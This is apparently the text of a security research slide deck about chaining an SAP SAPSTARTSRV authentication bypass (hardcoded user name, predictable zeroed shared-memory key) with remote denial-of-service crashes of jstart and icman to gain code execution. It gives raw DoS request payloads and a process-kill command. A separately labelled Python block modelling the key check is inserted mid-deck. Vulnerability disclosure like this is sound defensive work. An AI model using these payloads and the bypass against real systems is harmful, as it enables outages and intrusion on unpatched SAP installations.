SAP, DoS, DoS, race conditions => RCE - confidence...
About us
Business application security expert
Yet another security researcher
ERPScan
I know how to use translators
About ERPScan
• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of vulnerabilities in SAP and Oracle (500+)
• 100+ presentations at key security conferences worldwide
• 30+ awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Amsterdam (EU), offices in the USA, Australia and Denmark
About what?
• No blah-blah-blah about how important it is to spend time and money on SAP security (critically important)
• No blah-blah-blah about best practices
• No Junk Hacking
Just a little story about how we got yet another RCE in SAP
Target
• SAP and WEB?
– XSS, CSRF, double blind self clickjacking, whatever
• SAP and ABAP/JAVA?
– RFC, servlets, ABAP code, transactions
• SAP and additional services?
– Log Viewer, SDM, notepad, archives
Let's try some reverse engineering of the core binary file
DISP+WORK.EXE
dw - disp+work - Dispatcher & Workprocess - "The complete Kernel" - Here the complete ABAP is processed ...
DISP+WORK.EXE
Binary has a considerable size: ≈ 51 M
IDA db size: ≈ 133 M
Difficult to debug network communication
DISP+WORK.EXE
Difficulties with debugging network communication
Any child process may handle the request: it is difficult to guess the PID of the process to debug
Instance profile cfg
rdisp/TRACE = 2
rdisp/TRACE_RESOLUTION = 2
rdisp/TRACE_LOGGING = on
rdisp/TRACE_HIDE_SEC_DATA = off
rdisp/TRACE_COMPS = 2
enque/TRACE = 2
alert/TRACE = 2
service/trace = 2
rdisp/configurable_wp_no = 0
rdisp/wp_max_no = 0
rdisp/wp_no_dia = 1
rdisp/wp_no_btc = 0
rdisp/wp_no_vb = 0
rdisp/wp_no_vb2 = 0
rdisp/wp_no_spo = 0
Number of configurable work processes
Reverse engineering of DISP+WORK.EXE
• But
– It’s too difficult
– It’s too big
– I’m too lazy
– RCE takes too much time (maybe)
SEEK AND DESTROY
• Disp+work – here the complete ABAP is processed
• Gwrd – SAP gateway
• Icman (icm) – SAP Web Application Server
• Jstart – SAP AS Java Instance
• Sapstart – SAP starter
• Igswd_mt – SAP IGS (Internet Graphics Service)
• Igsmux_mt – SAP IGS
• Igspw_mt – SAP IGS
SAPSTARTSRV
• ≈ 15M
• LISTEN tcp 0 0.0.0.0:5NN13
• SOAP
– SAPControl:OSExecute ☺
• But ☹
– We need authentication
Reverse engineering of SAPSTARTSRV
• IsTrustedInternalConnect()
– JsfOpenShm()
– JsfCheckShmKeyString()
– JsfCloseShm()
Reverse engineering of SAPSTARTSRV
IsTrustedInternalConnect()
– Hardcoded user names
• “{2D4A6FB8-37F1-43d7-88BE-AD279C89DCD7}” – User name for requests with temporary local logon tickets.
• “{221BA44F-F88E-4166-BB2B-E2541910B86A}” – UNDOCUMENTED HARDCODED USER NAME
Shared memory
SHM - Shared Memory is an efficient means of passing data between programs. One program will create a memory portion which other processes (if permitted) can access.
Shared memory
• IsTrustedInternalConnect()
– JsfOpenShm() - ok
– JsfCheckShmKeyString() - ???
– JsfCloseShm() - ok
Shared memory
• JsfCheckShmKeyString()
• What is this key?
– Password for authentication on SAPSTARTSRV
• Is this key static?
– No
– Rng_PseudoRandomInit
– Rng_PseudoRandom
– Rng_CompleteUpdate
– Key len 36 bytes
• Can we guess this key (if not static)?
– No
• Can we brute-force this key?
– No
• JsfCheckShmKeyString()
– Read raw (binary) key from shm memory
– Convert key to readable format
– Add ‘x’ to the beginning and ‘x’ to the end of the key ☺ (why?)
– Check key against user input
– Return result
In our case xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
is the printable representation of the raw key
Hex dump: 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00
Some shared memory problems?
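The check described in the JsfCheckShmKeyString() slides above, modelled as an added example (not ERPScan's or SAP's code): it parses the slide's hex dump, shows that a zeroed shared-memory key collapses to one fully predictable string, and adds the sanity check a hardened implementation would need before accepting that key. The conversion to readable form is an assumption (one symbol per raw byte, 0x00 mapping to 'A'); the real routine is not on the page.

```python
import hmac
import string

# Constructed from the hex dump on the slide: 33 zero bytes (offsets 0x00..0x20).
SLIDE_HEX_DUMP = """\
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00
"""
# ASSUMPTION: one printable symbol per raw byte, with 0x00 -> 'A' (this matches the
# xAAA...Ax string on the slide); the real conversion routine is not on the page.
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def parse_hex_dump(dump: str) -> bytes:
    """Turn hexdump-style lines (offset, hex bytes, optional |ascii| column) into bytes."""
    out = bytearray()
    for line in dump.splitlines():
        fields = line.split("|")[0].split()               # drop the ascii column, tokenize
        out += bytes(int(tok, 16) for tok in fields[1:])  # fields[0] is the offset
    return bytes(out)


def to_printable(raw: bytes) -> str:
    """Readable form of the raw key, wrapped in 'x' at both ends as the slide describes."""
    return "x" + "".join(ALPHABET[b % len(ALPHABET)] for b in raw) + "x"


def check_key(shm_raw_key: bytes, user_input: str) -> bool:
    """Comparison step of the check as modelled here: convert, wrap, compare (constant-time)."""
    return hmac.compare_digest(to_printable(shm_raw_key), user_input)


def key_is_degenerate(raw: bytes, min_len: int = 33, min_distinct: int = 8) -> bool:
    """Defender-side sanity check: refuse an uninitialised (all-zero) or near-constant key. Thresholds are constructed."""
    return len(raw) < min_len or len(set(raw)) < min_distinct


def checked_key_compare(shm_raw_key: bytes, user_input: str) -> bool:
    """Hardened variant: refuse outright when the key found in shm is degenerate."""
    if key_is_degenerate(shm_raw_key):
        return False
    return check_key(shm_raw_key, user_input)


if __name__ == "__main__":
    raw = parse_hex_dump(SLIDE_HEX_DUMP)
    guess = "x" + "A" * len(raw) + "x"   # what a zeroed shm maps to under the assumption
    print(len(raw), check_key(raw, guess), checked_key_compare(raw, guess))  # 33 True False
```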
Instance profile cfg
rdisp/TRACE = 1337
rdisp/TRACE_RESOLUTION = 1337
rdisp/TRACE_LOGGING = on
rdisp/TRACE_HIDE_SEC_DATA = off
rdisp/TRACE_COMPS = 7
enque/TRACE = 7
alert/TRACE = 7
service/trace = 7
rdisp/configurable_wp_no = 0
rdisp/wp_max_no = 0
rdisp/wp_no_dia = 1
rdisp/wp_no_btc = 0
rdisp/wp_no_vb = 0
rdisp/wp_no_vb2 = 0
rdisp/wp_no_spo = 0
Instance profile cfg
#rdisp/TRACE = 1337
#rdisp/TRACE_RESOLUTION = 1337
#rdisp/TRACE_LOGGING = on
#rdisp/TRACE_HIDE_SEC_DATA = off
#rdisp/TRACE_COMPS = 7
#enque/TRACE = 7
#alert/TRACE = 7
#service/trace = 7
#rdisp/configurable_wp_no = 0
#rdisp/wp_max_no = 0
#rdisp/wp_no_dia = 1
#rdisp/wp_no_btc = 0
#rdisp/wp_no_vb = 0
#rdisp/wp_no_vb2 = 0
#rdisp/wp_no_spo = 0
+ RESTART WHOLE SYSTEM (OS)
Random ShmKey …
• After restart
– jstart started
– “Random” ShmKeyString is indeed random
– This key is NOT working:
“xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx”
HOW ABOUT JSTART …
Plan A:
Run authBypassOSExec_poc.py (with “magic key”)
Try to kill jstart (now only local)
$ killall -r jstart -9
REMOTE RCE
• PLAN
– Run authBypassOSExec_poc.py (with magic key)
– Find remote DoS for jstart
– Find remote DoS for icman
JSTART DoS
• DoS after ≈ 3 days
• Possible race condition
• jstart restarts after a crash
• EASY TARGET ^_^
JSTART DoS
Multiple requests:
"\x00\x00\x00\x1cNI_RTERR\x00y\x04\x00\x00ASD\x00\x00\x00\x04DAAAAAAA"
ICM
• The ICM is a component of the SAP NetWeaver Application Server. It is implemented as a separate process, which is started and monitored by the ABAP dispatcher.
• One of the core components of SAP
ICM
– Binary name icman.exe
– Size 5.7M
– IDA db ~ 100M
– One of the core components of SAP => thoroughly audited
ICM DoS
• Multiple requests:
'get / HTTP/1.0\r\nhost:\r\ncookie: ;\x0c%s\r\n\r\n' % ("\x0c" * 0x1b58)
• icman restarts after a crash
PROBLEMS …
• Race conditions …
• If we kill jstart before icman => NO RCE
• Small gap for the magic key between jstart and icman start
Solutions…
• ICM DoS:
– SAP note 2256185 (Dmitry Yudin)
• jstart DoS:
– SAP note 2259547 (Dmitry Yudin)
• MC auth bypass:
– SAP note 2259547 (Dmitry Chastuhin, Dmitry Yudin)
Conclusion
• Don’t give up. If you can't exploit a vulnerability using one issue, try to find another way to trigger it
• Holistic approach + correlation (code, SOD, vulnerabilities)
• Probably a lot of vulnerabilities still do exist on a binary level of different SAP services
• Have fun!
About
228 Hamilton Avenue, Fl. 3,Palo Alto, CA. 94301
USA HQ
Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam
EU HQ
www.erpscan.com [email protected]
@_chipik @ret5et